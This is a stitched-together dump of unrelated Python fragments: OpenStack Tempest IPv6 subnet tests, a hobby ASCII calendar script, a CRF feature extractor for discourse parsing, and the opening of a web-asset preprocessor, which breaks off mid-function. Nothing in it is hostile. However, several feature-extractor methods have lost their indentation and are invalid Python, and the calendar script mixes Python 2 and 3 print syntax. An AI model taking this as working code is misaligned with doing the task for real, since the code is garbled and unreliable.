        net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
        gateway = str(netaddr.IPAddress(net.first + 2))
        name = data_utils.rand_name('network-')
        network = self.create_network(network_name=name)
        subnet = self.create_subnet(network, gateway)
        # Verifies Subnet GW in IPv6
        self.assertEqual(subnet['gateway_ip'], gateway)
    @test.attr(type='smoke')
    @test.idempotent_id('ebb4fd95-524f-46af-83c1-0305b239338f')
    def test_create_delete_subnet_with_default_gw(self):
        # No gateway given: Neutron should default to the first address.
        net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
        gateway_ip = str(netaddr.IPAddress(net.first + 1))
        name = data_utils.rand_name('network-')
        network = self.create_network(network_name=name)
        subnet = self.create_subnet(network)
        # Verifies Subnet GW in IPv6
        self.assertEqual(subnet['gateway_ip'], gateway_ip)
    @test.attr(type='smoke')
    @test.idempotent_id('a9653883-b2a4-469b-8c3c-4518430a7e55')
    def test_create_list_subnet_with_no_gw64_one_network(self):
        # One network carrying both an IPv6 subnet (with gateway) and a
        # gateway-less IPv4 subnet.
        name = data_utils.rand_name('network-')
        # NOTE(review): `name` is passed positionally here while the other
        # tests use network_name=name -- confirm create_network's signature.
        network = self.create_network(name)
        ipv6_gateway = self.subnet_dict(['gateway'])['gateway']
        subnet1 = self.create_subnet(network,
                                     ip_version=6,
                                     gateway=ipv6_gateway)
        self.assertEqual(netaddr.IPNetwork(subnet1['cidr']).version, 6,
                         'The created subnet is not IPv6')
        subnet2 = self.create_subnet(network,
                                     gateway=None,
                                     ip_version=4)
        self.assertEqual(netaddr.IPNetwork(subnet2['cidr']).version, 4,
                         'The created subnet is not IPv4')
        # Verifies Subnet GW is set in IPv6
        self.assertEqual(subnet1['gateway_ip'], ipv6_gateway)
        # Verifies Subnet GW is None in IPv4
        self.assertEqual(subnet2['gateway_ip'], None)
        # Verifies all 2 subnets in the same network
        body = self.client.list_subnets()
        subnets = [sub['id'] for sub in body['subnets']
                   if sub['network_id'] == network['id']]
        test_subnet_ids = [sub['id'] for sub in (subnet1, subnet2)]
        self.assertItemsEqual(subnets,
                              test_subnet_ids,
                              'Subnet are not in the same network')
class NetworksIpV6TestAttrs(NetworksIpV6TestJSON):
    # Adds coverage for the extended IPv6 subnet attributes
    # (ipv6_ra_mode / ipv6_address_mode).
    @classmethod
    def resource_setup(cls):
        # Skip the whole class when extended IPv6 attributes are disabled.
        if not CONF.network_feature_enabled.ipv6_subnet_attributes:
            raise cls.skipException("IPv6 extended attributes for "
                                    "subnets not available")
        super(NetworksIpV6TestAttrs, cls).resource_setup()
    @test.attr(type='smoke')
    @test.idempotent_id('da40cd1b-a833-4354-9a85-cd9b8a3b74ca')
    def test_create_delete_subnet_with_v6_attributes_stateful(self):
        self._create_verify_delete_subnet(
            gateway=self._subnet_data[self._ip_version]['gateway'],
            ipv6_ra_mode='dhcpv6-stateful',
            ipv6_address_mode='dhcpv6-stateful')
    @test.attr(type='smoke')
    @test.idempotent_id('176b030f-a923-4040-a755-9dc94329e60c')
    def test_create_delete_subnet_with_v6_attributes_slaac(self):
        self._create_verify_delete_subnet(
            ipv6_ra_mode='slaac',
            ipv6_address_mode='slaac')
    @test.attr(type='smoke')
    @test.idempotent_id('7d410310-8c86-4902-adf9-865d08e31adb')
    def test_create_delete_subnet_with_v6_attributes_stateless(self):
        self._create_verify_delete_subnet(
            ipv6_ra_mode='dhcpv6-stateless',
            ipv6_address_mode='dhcpv6-stateless')
    def _test_delete_subnet_with_ports(self, mode):
        """Create subnet and delete it with existing ports"""
        slaac_network = self.create_network()
        subnet_slaac = self.create_subnet(slaac_network,
                                          **{'ipv6_ra_mode': mode,
                                             'ipv6_address_mode': mode})
        port = self.create_port(slaac_network)
        self.assertIsNotNone(port['fixed_ips'][0]['ip_address'])
        self.client.delete_subnet(subnet_slaac['id'])
        # create_subnet registered the subnet for cleanup; it is gone now.
        self.subnets.pop()
        subnets = self.client.list_subnets()
        subnet_ids = [subnet['id'] for subnet in subnets['subnets']]
        self.assertNotIn(subnet_slaac['id'], subnet_ids,
                         "Subnet wasn't deleted")
        # The network still has live ports, so deleting it must conflict.
        self.assertRaisesRegexp(
            lib_exc.Conflict,
            "There are one or more ports still in use on the network",
            self.client.delete_network,
            slaac_network['id'])
    @test.attr(type='smoke')
    @test.idempotent_id('88554555-ebf8-41ef-9300-4926d45e06e9')
    def test_create_delete_slaac_subnet_with_ports(self):
        """Test deleting subnet with SLAAC ports

        Create subnet with SLAAC, create ports in network
        and then you shall be able to delete subnet without port
        deletion. But you still can not delete the network.
        """
        self._test_delete_subnet_with_ports("slaac")
    @test.attr(type='smoke')
    @test.idempotent_id('2de6ab5a-fcf0-4144-9813-f91a940291f1')
    def test_create_delete_stateless_subnet_with_ports(self):
        """Test deleting subnet with DHCPv6 stateless ports

        Create subnet with DHCPv6 stateless, create ports in network
        and then you shall be able to delete subnet without port
        deletion. But you still can not delete the network.
        """
        self._test_delete_subnet_with_ports("dhcpv6-stateless")
| |
#!/bin/python
import sys;
import random;
import os;
def menu():
    """Print the PyCal banner, usage summary, flags and notes to stdout."""
    # print() with a single parenthesised argument behaves identically
    # under Python 2 and Python 3.
    print("Welcome to PyCal")
    print("===========================================================")
    print("Author : Abel Gancsos")
    print("Version : 1.0.1")
    print("Description: This application will generate an ASCII")
    print(" calendar for the user-given calendar, month,")
    print(" and year. It can also list the days of the")
    print(" month in a text table form.")
    print("Purpose : The purpose of this application was to write")
    print(" an applicaiton using date algorithms using")
    print(" two custom Python classes.")
    print("===========================================================")
    print("\n===========================================================")
    print("Usage:")
    # Bug fix: the usage line previously read "[-h|-help|-n|-y|-m" --
    # unterminated and missing the -d and --no-headers flags.
    print("python pycal.py [-h|-help|-n|-m|-y|-d|--no-headers]")
    print("Flags:")
    print("-h|-help: help")
    print("-n: name of the calendar")
    print("-m: full month name")
    print("-y: YYYY")
    print("-d: display (text|ASCII|both->default)")
    print("--no-headers: don't print the headers")
    print("===========================================================")
    print("\n===========================================================")
    print("Notes:")
    print("+YOU MUST PROVIDE AT LEAST ONE FLAG!!!!!!!!!!!!!!!!!!!!!!!!")
    print("+At this time the ASCII representation only prints the first")
    print(" day and days that match the 7 day sequence.")
    print("===========================================================")
class day:
    """A day-of-month value with day-of-year and day-of-week helpers.

    NOTE(review): leap years are treated as year % 4 == 0 (no century
    rule), and years are assumed to have exactly four digits -- confirm
    whether full Gregorian accuracy is required.
    """
    # Index 0 is Sunday; this ordering matches the weekday formula in
    # get_dow(), whose result is taken modulo 7.
    days_str = "Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday"
    days = days_str.split(",")
    # Month names and the non-leap month lengths January..November
    # (December's length is never needed as a day-of-year offset).
    month_names = ["January", "February", "March", "April", "May", "June",
                   "July", "August", "September", "October", "November",
                   "December"]
    month_lengths = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30]
    def get_doy(self, month):
        """Return the day-of-year (non-leap) of this day within `month`.

        `month` is a full month name; anything else yields 0, matching the
        original fall-through behaviour.  Bug fix: the November and
        December branches previously counted January as 30 days, making
        their results one day too small.
        """
        if month not in self.month_names:
            return 0
        offset = sum(self.month_lengths[:self.month_names.index(month)])
        return offset + self.num_value
    def left_pad(self, mstring, mlen, mchar):
        """Pad mstring on the left with mchar up to mlen characters."""
        return mchar * max(0, mlen - len(mstring)) + mstring
    def right_pad(self, mstring, mlen, mchar):
        """Pad mstring on the right with mchar up to mlen characters."""
        return mstring + mchar * max(0, mlen - len(mstring))
    def get_dow(self, num_value, month, year):
        """Return the weekday name for year-month-num_value.

        Unlike get_doy(), `month` is numeric here (1..12).  Implements the
        classic month-table day-of-week algorithm.
        """
        leap = 1 if year % 4 == 0 else 0
        if 1 <= month <= 12:
            month_table = (2, 3, 3, 6, 1, 4, 6, 2, 5, 0, 3, 5)[month - 1]
            if leap == 1:
                # January and February use adjusted offsets in leap years.
                if month == 1:
                    month_table = -1
                elif month == 2:
                    month_table = 2
        else:
            month_table = 0  # unknown month: keep the original fall-through
        yr = int(str(year)[2:4])  # last two digits of a 4-digit year
        final = num_value + month_table + yr + yr // 4 + self.get_century(year)
        return self.days[final % 7]
    def get_century(self, year):
        """Return the Gregorian century offset used by get_dow().

        17xx -> 4, 18xx -> 2, 19xx -> 0, 20xx -> 6, repeating every 400
        years.  Bug fix: the original returned 0 for every century whose
        first two digits were not divisible by 4, which is only correct
        for 19xx-style centuries (e.g. 18xx should be 2, 17xx should be 4).
        """
        century = int(str(year)[:2])  # assumes a 4-digit year
        return (3 - century % 4) * 2
    def __init__(self, num_value):
        # Zero-padded pseudo-random 8-character identifier.
        self.id = self.left_pad(str(random.randint(1, 9999)), 8, "0")
        self.num_value = num_value
        # NOTE(review): this maps days 1-6 to "Saturday" (index -1); the
        # intended mapping is unclear, so the original behaviour is kept.
        self.str_value = self.days[self.num_value // 7 - 1]
        # NOTE(review): get_doy() expects a month NAME, so passing the
        # numeric day always yields 0; preserved because callers compute
        # day-of-year via get_doy(month) themselves.
        self.doy = self.get_doy(self.num_value)
class calendar:
    """An ASCII/text calendar for one (name, month, year) triple.

    NOTE(review): leap years use year % 4 == 0 only (no century rule),
    and self.leap_year never changes get_num_days()'s February=28 result
    -- confirm intended.
    """
    def __init__(self,name,month,year):
        # Random zero-padded 8-character id, mirroring day.id.
        self.id=day(1).left_pad(str(random.randint(1,9999)),8,"0");
        self.name=name;
        self.month=month;
        self.year=year;
        self.num_of_days=self.get_num_days();
        if self.year%4==0:
            self.leap_year=1;
        else:
            self.leap_year=0;
    def get_num_days(self):
        # Days in self.month for a non-leap year; 0 for an unknown name.
        if self.month=="January":
            return 31;
        if self.month=="February":
            return 28;
        if self.month=="March":
            return 31;
        if self.month=="April":
            return 30;
        if self.month=="May":
            return 31;
        if self.month=="June":
            return 30;
        if self.month=="July":
            return 31;
        if self.month=="August":
            return 31;
        if self.month=="September":
            return 30;
        if self.month=="October":
            return 31;
        if self.month=="November":
            return 30;
        if self.month=="December":
            return 31;
        else:
            return 0;
    def num_month(self,month):
        # Map the month name to its 1-based number; 0 when unknown.
        # NOTE(review): the `month` parameter is ignored -- self.month is
        # always consulted instead.
        if self.month=="January":
            return 1;
        if self.month=="February":
            return 2;
        if self.month=="March":
            return 3;
        if self.month=="April":
            return 4;
        if self.month=="May":
            return 5;
        if self.month=="June":
            return 6;
        if self.month=="July":
            return 7;
        if self.month=="August":
            return 8;
        if self.month=="September":
            return 9;
        if self.month=="October":
            return 10;
        if self.month=="November":
            return 11;
        if self.month=="December":
            return 12;
        else:
            return 0;
    def print_header(self):
        # Banner with the calendar's metadata.
        print day(1).right_pad("",80,"=");
        print "ID: "+self.id;
        print "Name: "+self.name;
        print "Month: "+self.month;
        print "Year: "+str(self.year);
        print "Leap Year: "+str(self.leap_year);
        print "Number of Days: "+str(self.num_of_days);
        print day(1).right_pad("",80,"=");
    def print_text_calendar(self):
        # One row per day: day number, weekday name, day-of-year.
        # NOTE(review): header cells are padded to 10 but data cells to 12,
        # so the columns do not line up exactly.
        print day(1).right_pad("",80,"=");
        print "|"+day(1).right_pad("Day",10," ")+"|"+day(1).right_pad("DOW",10," ")+"|"+day(1).right_pad("DOY",10," ")+"|";
        print day(1).right_pad("",80,"=");
        i=1;
        while i<=self.num_of_days:
            current_day=day(i);
            print current_day.right_pad(str(i),12," ")+current_day.right_pad(current_day.get_dow(i,self.num_month(self.month),self.year),12," ")+str(current_day.get_doy(self.month));
            i+=1;
        print day(1).right_pad("",80,"=");
    def print_calendar(self):
        # ASCII week grid.  Per the file's own notes this rendering is
        # known-incomplete (only the first day and 7-day matches appear).
        # NOTE(review): day(day_index%7) and get_dow(day_index/7, ...) look
        # suspect -- the row/column bookkeeping likely never drifts past
        # the first week; preserved byte-for-byte.
        print day(1).right_pad("",80,"=");
        sys.stdout.write("|");
        for full_day in day(1).days:
            sys.stdout.write(day(1).right_pad(full_day,10," ")+"|");
        print;
        print day(1).right_pad("",80,"=");
        i=1;
        day_index=1;
        while i<=self.num_of_days:
            current_day=day(day_index%7);
            j=0;
            days=current_day.days;
            sys.stdout.write("|");
            while j<len(days):
                if current_day.get_dow(day_index/7,self.num_month(self.month),self.year)==days[j-1]:
                    sys.stdout.write(current_day.right_pad(str(i),10," ")+"|");
                else:
                    sys.stdout.write(current_day.right_pad("",10," ")+"|");
                j+=1;
            print;
            i+=7;
            day_index+=1;
        print day(1).right_pad("",80,"=");
## int main -- parse "-flag value" pairs, then print the requested view(s).
name = "Default Name"
month = "January"
year = 2014
display = "both"
headers = 1
if len(sys.argv) > 1:
    if sys.argv[1] == "-h" or sys.argv[1] == "-help":
        menu()
    else:
        i = 1
        while i < len(sys.argv):
            # elif chain: each argv slot matches at most one flag anyway.
            if sys.argv[i] == "-n":
                name = sys.argv[i + 1]
            elif sys.argv[i] == "-m":
                month = sys.argv[i + 1]
            elif sys.argv[i] == "-y":
                year = int(sys.argv[i + 1])
            elif sys.argv[i] == "-d":
                display = sys.argv[i + 1]
            elif sys.argv[i] == "--no-headers":
                headers = 0
            i += 1
        my_cal = calendar(name, month, year)
        if headers == 1:
            my_cal.print_header()
        # Dispatch on the requested display mode; "both" prints the text
        # table first, then the ASCII grid.
        if display == "text":
            my_cal.print_text_calendar()
        elif display == "ASCII":
            my_cal.print_calendar()
        elif display == "both":
            my_cal.print_text_calendar()
            my_cal.print_calendar()
else:
    # No arguments at all: show the usage menu (the dangling `else:` in the
    # original made this binding ambiguous; it belongs to the argc check).
    menu()
###################################################
| |
'''
Created on 2013-12-22
@author: Wei
'''
import utils.serialize
from utils.rst_lib import *
class CRFTreeFeatureWriter:
    def __init__(self, verbose):
        # Feature strings accumulated for the current labeling batch;
        # cleared by write_features_for_constituents().
        self.features = set()
        self.verbose = verbose
        # Pre-computed cue-phrase lexicon, deserialized from disk.
        self.cue_phrases = utils.serialize.loadData('cue_phrases')
        if self.verbose:
            print 'Loaded %d cue phrases for CRF labeling' % len(self.cue_phrases)
    def write_organization_features(self, constituent, scope, unit, position):
        '''
        1. number of EDUs in unit1 or unit2.
        2. number of tokens in unit1 or unit2.
        3. distance of unit1 in EDUs to the beginning (or to the end) of the sentence.
        4. distance of unit2 in EDUs to the beginning (or to the end) of the sentence.

        Returns (num_edus, subtree_height).
        NOTE(review): the caller in write_features_for_constituents appears
        to unpack this as (l_subtree_height, l_num_edus), i.e. in reversed
        order -- confirm which order is intended.
        '''
        num_edus = constituent.get_num_edus()
        if scope:
            # Intra-sentential case: the constituent must not cross a
            # sentence boundary.
            assert constituent.start_sent_id == constituent.end_sent_id
            start_edu_offset = constituent.l_start - constituent.doc.sentences[constituent.start_sent_id].start_edu
            end_edu_offset = constituent.doc.sentences[constituent.end_sent_id].end_edu - constituent.r_end
            if start_edu_offset == 0:
                self.features.add("First_EDU_Unit%d@%d" % (unit, position))
            if end_edu_offset == 0:
                self.features.add("Last_EDU_Unit%d@%d" % (unit,position))
        subtree_height = constituent.get_subtree_height()
        if subtree_height == 1:
            self.features.add('Bottom_Level_Subtree_Unit%d@%d' % (unit, position))
        return num_edus, subtree_height
    def write_Ngram_features(self, constituent, unit, position):
        '''
        N = 1, 2, 3
        1. Beginning (or end) lexical N-grams in unit 1.
        2. Beginning (or end) lexical N-grams in unit 2.
        3. Beginning (or end) POS N-grams in unit 1.
        4. Beginning (or end) POS N-grams in unit 2.
        '''
        for n in range(1, 4):
            # Positive n = prefix n-gram, negative n = suffix n-gram.
            pref_PoS_ngrams = constituent.get_POS_ngram(n)
            self.features.add('Beginning_POS_%d-grams_Unit%d=%s@%d' % (n, unit, '-'.join(pref_PoS_ngrams), position))
            pref_lexical_ngrams = constituent.get_ngram(n)
            self.features.add('Beginning_Lexical_%d-grams_Unit%d=%s@%d' % (n, unit, '-'.join(pref_lexical_ngrams), position))
            # NOTE(review): 'End_Lexical_Lexical' duplicates the word
            # "Lexical" in the template name; left untouched because the
            # feature string must match any previously extracted data.
            end_lexical_ngrams = constituent.get_ngram(-n)
            self.features.add('End_Lexical_Lexical_%d-grams_Unit%d=%s@%d' % (n, unit, '-'.join(end_lexical_ngrams), position))
            end_PoS_ngrams = constituent.get_POS_ngram(-n)
            self.features.add('End_POS_%d-grams_Unit%d=%s@%d' % (n, unit, '-'.join(end_PoS_ngrams), position))
    def write_dominance_set_features(self, L, R, position):
        """Add syntactic dominance features for adjacent constituents L and R.

        For each unit whose span lies in a single sentence, records the top
        syntactic tag of the spanning subtree and of its minimal covering
        subtrees; if both units end up in the same sentence, also records
        head/dominance relations around their lowest common ancestor.
        """
        assert L.doc == R.doc
        l_start_sent = L.start_sent_id
        l_start_word = L.start_word
        l_end_sent = L.end_sent_id
        l_end_word = L.end_word
        r_start_sent = R.start_sent_id
        r_start_word = R.start_word
        r_end_sent = R.end_sent_id
        r_end_word = R.end_word
        l_subtrees_top_tags = []
        if l_start_sent == l_end_sent:
            t = L.doc.sentences[l_start_sent].parse_tree
            l_ancestor_pos = t.treeposition_spanning_leaves(l_start_word, l_end_word)
            # For a single-leaf span, step up from the POS node to its parent.
            if l_end_word == l_start_word + 1:
                l_ancestor_pos = l_ancestor_pos[ : -1]
            l_ancestor_subtree = t[l_ancestor_pos]
            self.features.add('Top_syntactic_tag_Unit1=%s@%d' % (l_ancestor_subtree.label(), position))
            # "Valid" = the spanning subtree covers exactly the unit's words.
            if len(l_ancestor_subtree.leaves()) == l_end_word - l_start_word:
                self.features.add('Valid_syntax_subtree_Unit1@%d' % position)
            l_subtrees = utils.utils.get_syntactic_subtrees(t, l_start_word, l_end_word)
            self.features.add('Num_Syntax_subtrees_Unit1=%d@%d' % (len(l_subtrees), position))
            if len(l_subtrees) == 1:
                self.features.add('Top_Syntax_tag_Unit1=%s@%d' % (l_subtrees[0].label(), position))
            l_subtree_top_tags = []
            for (i, subtree) in enumerate(l_subtrees):
                l_subtree_top_tags.append(subtree.label())
            l_subtrees_top_tags.append(l_subtree_top_tags)
        else:
            l_ancestor_pos = ()
        r_subtrees_top_tags = []
        if r_start_sent == r_end_sent:
            # Mirror of the Unit1 block above, for the right constituent.
            t = R.doc.sentences[r_start_sent].parse_tree
            r_ancestor_pos = t.treeposition_spanning_leaves(r_start_word, r_end_word)
            if r_end_word == r_start_word + 1:
                r_ancestor_pos = r_ancestor_pos[ : -1]
            r_ancestor_subtree = t[r_ancestor_pos]
            self.features.add('Top_syntactic_tag_Unit2=%s@%d' % (r_ancestor_subtree.label(), position))
            if len(r_ancestor_subtree.leaves()) == r_end_word - r_start_word:
                self.features.add('Valid_syntax_subtree_Unit2@%d' % position)
            r_subtrees = utils.utils.get_syntactic_subtrees(t, r_start_word, r_end_word)
            self.features.add('Num_Syntax_subtrees_Unit2=%d@%d' % (len(r_subtrees), position))
            if len(r_subtrees) == 1:
                self.features.add('Top_Syntax_tag_Unit2=%s@%d' % (r_subtrees[0].label(), position))
            r_subtree_top_tags = []
            for (i, subtree) in enumerate(r_subtrees):
                r_subtree_top_tags.append(subtree.label())
            r_subtrees_top_tags.append(r_subtree_top_tags)
        else:
            r_ancestor_pos = ()
        # Minimum normalized edit distance between the covering-subtree tag
        # sequences of the two units (1.0 when either side is empty).
        min_top_tags_edit_distance = 1.0
        for l_top_tags in l_subtrees_top_tags:
            for r_top_tags in r_subtrees_top_tags:
                distance = utils.utils.compute_edit_distance(l_top_tags, r_top_tags)
                distance_norm = distance * 1.0 / max(len(l_top_tags), len(r_top_tags))
                min_top_tags_edit_distance = min(min_top_tags_edit_distance, distance_norm)
        self.features.add('Min_Subtrees_Top_Syntactic_Tags_Distance=%.3f@%d' % (min_top_tags_edit_distance,
                                                                                position))
        # The dominance features below only apply when both units share a
        # single sentence.
        if l_start_sent != r_end_sent:
            return
        t = L.doc.sentences[l_start_sent].parse_tree
        common_ancestor_pos = common_ancestor(l_ancestor_pos, r_ancestor_pos)
        dist_ancestor_l = len(l_ancestor_pos) - len(common_ancestor_pos)
        dist_ancestor_r = len(r_ancestor_pos) - len(common_ancestor_pos)
        # NOTE(review): when common_ancestor_pos is the root (length 0) the
        # normalizations below divide by zero -- confirm that cannot happen.
        if dist_ancestor_l:
            head = filter_lexical_head(t.get_head(l_ancestor_pos))
            self.features.add('Top_lexical_head_Unit1=%s@%d' % (head, position))
            self.features.add('Dist_ancestor_norm_Unit1=%s@%d' % (dist_ancestor_l/float(len(common_ancestor_pos)), position))
        if dist_ancestor_r:
            head = filter_lexical_head(t.get_head(r_ancestor_pos))
            self.features.add('Top_lexical_head_Unit2=%s@%d' % (head, position))
            # NOTE(review): this reuses dist_ancestor_l; dist_ancestor_r was
            # probably intended -- confirm before relying on this feature.
            self.features.add('Dist_ancestor_norm_Unit2=%s@%d' % (dist_ancestor_l/float(len(common_ancestor_pos)), position))
        if common_ancestor_pos:
            syntax_tree = t
            # Which side holds the common ancestor's lexical head.
            head_pos = syntax_tree[common_ancestor_pos].head
            if head_pos >= l_end_word:
                self.features.add('Head_in_R@%d' % position)
            else:
                self.features.add('Head_in_L@%d' % position)
            # Zero distance means that unit's subtree IS the common ancestor,
            # i.e. it dominates the other unit.
            if dist_ancestor_l == 0 or dist_ancestor_r == 0:
                if dist_ancestor_l == 0:# L >> R
                    self.features.add('L_Dominates_R@%d' % position)
                    dom_pos = r_ancestor_pos[:-1]
                else: # R >> L
                    self.features.add('R_Dominates_L@%d' % position)
                    dom_pos = l_ancestor_pos[:-1]
                head = filter_lexical_head(syntax_tree.get_head(dom_pos))
                # if head and head in self.lexical_heads:
                if head:
                    self.features.add('Dominated_lexical_head=%s@%d' % (head, position))
                tag = filter_syntactic_tag(syntax_tree.get_syntactic_tag(dom_pos))
                if tag :
                    self.features.add('Dominated_Syntactic_tag=%s@%d' % (tag, position))
def write_substructure_features(self, constituent, unit = 1, position = 0):
self.features.add("Unit%d_Subtree_Rel_Root=%s@%d" % (unit, constituent.get_subtree_rel(), position))
def write_text_structureal_features(self, constituent, unit, position):
'''
Number of sentences in unit 1 (or unit 2).
'''
start_sent = constituent.start_sent_id
end_sent = constituent.end_sent_id
if start_sent == 0:
self.features.add('First_Sentence_Unit%d@%d' % (unit, position))
if end_sent == len(constituent.doc.sentences) - 1:
self.features.add('Last_Sentence_Unit%d@%d' % (unit, position))
num_sents = end_sent - start_sent + 1
num_paragraphs = 0
for i in range(constituent.l_start, constituent.r_end):
# print constituent.doc.edus[i]
if constituent.doc.edus[i][-1] == '<P>':
num_paragraphs += 1
return num_sents, num_paragraphs
def write_cue_phrase_features(self, constituent, unit = 1, position = 0):
if not constituent.is_leaf():
edus = [constituent.doc.edus[constituent.l_start], constituent.doc.edus[constituent.r_end - 1]]
else:
edus = [constituent.doc.edus[constituent.l_start]]
candidates = []
for edu in edus:
candidates.append(' ' + ' '.join(edu).lower().replace('<s>', '').replace('<p>', '') + ' ')
for cue_phrase in self.cue_phrases:
for (i, cand_span) in enumerate(candidates):
cue_position = 'Beginning' if i == 0 else 'Ending'
pos = cand_span.find(" " + cue_phrase + " ")
if pos >= 0:
if i == 0 and pos < 3:
self.features.add('Unit%d_%s_Cue_Phrase=%s@%d' % (unit, cue_position, cue_phrase.replace(' ', '#'), position))
elif i == 1 and cand_span[pos : ].split(' ') <= 3:
self.features.add('Unit%d_%s_Cue_Phrase=%s@%d' % (unit, cue_position, cue_phrase.replace(' ', '#'), position))
    def write_features_for_constituents(self, constituents, positions, scope, labeling):
        """Populate self.features with pairwise features for each adjacent
        (L, R) constituent pair and return the feature set.

        :param constituents: candidate constituents; pair i is
            (constituents[i], constituents[i + 1])
        :param positions: position tags, one per pair; appended as the
            '@<position>' suffix on every feature name
        :param scope: truthy for sentence-level parsing, falsy for
            document-level parsing (enables text-structural features)
        :param labeling: unused in this method; kept for interface parity
        :returns: the shared self.features set (cleared on entry)
        """
        self.features.clear()
        for (i, position) in enumerate(positions):
            L = constituents[i]
            R = constituents[i + 1]
            if L and R:
                # print 'c1:', constituent1.print_span(), 'c2:', constituent2.print_span()
                # organization features plus relative height / EDU-count comparisons
                l_subtree_height, l_num_edus = self.write_organization_features(L, scope, 1, position)
                r_subtree_height, r_num_edus = self.write_organization_features(R, scope, 2, position)
                if l_subtree_height < r_subtree_height:
                    self.features.add('L_Lower_Subtree_Height_Than_R@%d' % position)
                elif r_subtree_height < l_subtree_height:
                    self.features.add('R_Lower_Subtree_Height_Than_L@%d' % position)
                else:
                    self.features.add('L_R_Same_Subtree_Height@%d' % position)
                if l_num_edus < r_num_edus:
                    self.features.add('L_Fewer_EDUs_Than_R@%d' % position)
                elif r_num_edus < l_num_edus:
                    self.features.add('R_Fewer_EDUs_Than_L@%d' % position)
                else:
                    # NOTE(review): this equal-EDU-count branch re-emits
                    # 'L_R_Same_Subtree_Height' ('L_R_Same_Num_EDUs' was likely
                    # intended -- looks like a copy-paste slip). Left unchanged:
                    # trained models may depend on the existing feature name.
                    self.features.add('L_R_Same_Subtree_Height@%d' % position)
                self.write_Ngram_features(L, 1, position)
                self.write_Ngram_features(R, 2, position)
                self.write_dominance_set_features(L, R, position)
                if not scope:
                    # document-level only: sentence/paragraph count comparisons
                    l_num_sents, l_num_paragraphs = self.write_text_structureal_features(L, 1, position)
                    r_num_sents, r_num_paragraphs = self.write_text_structureal_features(R, 2, position)
                    if l_num_sents < r_num_sents:
                        self.features.add('L_Fewer_Num_Sentences_Than_R@%d' % position)
                    elif r_num_sents < l_num_sents:
                        self.features.add('R_Fewer_Num_Sentences_Than_L@%d' % position)
                    else:
                        self.features.add('L_R_Same_Num_Sentences@%d' % position)
                    if l_num_paragraphs < r_num_paragraphs:
                        self.features.add('L_Fewer_Num_Paragraphs_Than_R@%d' % position)
                    elif r_num_paragraphs < l_num_paragraphs:
                        self.features.add('R_Fewer_Num_Paragraphs_Than_L@%d' % position)
                    else:
                        self.features.add('L_R_Same_Num_Paragraphs@%d' % position)
                self.write_substructure_features(L, 1, position)
                self.write_substructure_features(R, 2, position)
                self.write_cue_phrase_features(L, 1, position)
                self.write_cue_phrase_features(R, 2, position)
                # token-count comparison with a 1.5x tolerance band
                l_num_tokens = L.get_num_tokens()
                r_num_tokens = R.get_num_tokens()
                if l_num_tokens * 1.5 < r_num_tokens:
                    self.features.add('L_Fewer_Num_Tokens_Than_R@%d' % position)
                elif r_num_tokens * 1.5 < l_num_tokens:
                    self.features.add('R_Fewer_Num_Tokens_Than_L@%d' % position)
                else:
                    self.features.add('L_R_Same_Num_Tokens@%d' % position)
                # mark the pair that would complete the sentence (scope) or the
                # whole document (no scope)
                if scope:
                    assert L.start_sent_id == L.end_sent_id
                    sent_num_edus = L.doc.sentences[L.start_sent_id].end_edu - L.doc.sentences[L.start_sent_id].start_edu
                    if (L.get_num_edus() + R.get_num_edus()) == sent_num_edus:
                        self.features.add('Last_Pair@%d' % position)
                else:
                    if (L.get_num_edus() + R.get_num_edus()) == len(L.doc.edus):
                        self.features.add('Last_Pair@%d' % position)
        return self.features
| |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
import re
from base64 import b64encode
import subprocess as sp
import urllib3
from ply import lex, yacc
# Retain a copy so we don't unnecessarily waste time recreating them.
http = urllib3.PoolManager()  # shared HTTP connection pool for remote includes
global_lexer = None   # cached PLY lexer; cloned per file by create_lexer()
global_parser = None  # cached PLY parser; reused by create_parser()
tokens = None         # PLY token-name list; populated inside create_lexer()
def stderr(msg, kill=0):
    """Write *msg* to standard error, flushing stdout first so output stays
    ordered; when *kill* is non-zero, terminate with that exit status."""
    sys.stdout.flush()
    sys.stderr.write(msg)
    if kill != 0:
        exit(kill)
def stdout(msg):
    """Write *msg* to standard output without appending a newline."""
    sys.stdout.write(msg)
def process_file(file_path, script_vars=None, compress=False, escape=None):
    '''This is essentially a router for matching file extensions with the
    appropriate processor. If no appropriate processor is available
    default_processor is used. Since some content may be embedded in a string
    it may be necessary to escape the quote characters for that string
    implementation.

    :param file_path: path of the file to process
    :param script_vars: optional dict of variables handed to the processor
    :param compress: ask the processor to minify its output
    :param escape: quote character to backslash-escape in the result
    '''
    # BUG FIX: avoid a shared mutable default argument
    if script_vars is None:
        script_vars = {}
    # get the file extention
    ext = file_path.rsplit('.', 1)[-1]
    handler = {
        'htm': html_processor,
        'html': html_processor,
        'hbs': html_processor,
        'svg': svg_processor,
        'sass': sass_processor,
        'css': css_processor,
        'js': js_processor
    }.get(ext, default_processor)
    content = handler(file_path, script_vars, compress)
    # if the content is used in a string then we'll need to ensure the correct
    # string syntax is escaped.
    # TODO: consider performing a full escape
    if escape:
        content = content.replace('\\', '\\\\') \
                         .replace(escape, "\\{0}".format(escape))
    return content
def import_file(filepath, dirpath):
    """Resolve *filepath* (optionally prefixed with 'base64:'), run it through
    process_file with compression enabled, and return the content; the result
    is base64 encoded when the prefix was present."""
    wants_base64 = filepath.startswith('base64:')
    if wants_base64:
        # drop the 'base64:' prefix before resolving the path
        filepath = filepath[7:]
    if filepath.startswith('/'):
        # root relative import
        filepath = filepath[1:]
    else:
        # NOTE(review): these two writes look like leftover debug output
        # (no newline, no message prefix) -- preserved to keep behaviour.
        stderr(dirpath)
        stderr(filepath)
        filepath = '{0}/{1}'.format(dirpath, filepath)
    data = process_file(filepath, compress=True, escape="'")
    if wants_base64:
        data = b64encode(data.encode()).decode('utf-8')
    return data
#TODO: catch url contents
def include_file(filepath, dirpath, script_vars):
    """Return processed JS for *filepath*: fetched over HTTP(S) when the path
    is a URL, otherwise read from disk (root- or *dirpath*-relative) and fed
    through js_processor with *script_vars*."""
    global http
    # TODO: proto = file:// for files from root
    if re.match(r'^http(s)?://', filepath):
        response = http.request('GET', filepath)
        if response.status != 200:
            msg = 'Error while including: {0}, status: {1}'
            msg = msg.format(filepath, response.status)
            stderr(msg, 1)
        # assume the file is utf-8 encoded unless otherwise stated in the
        # content type
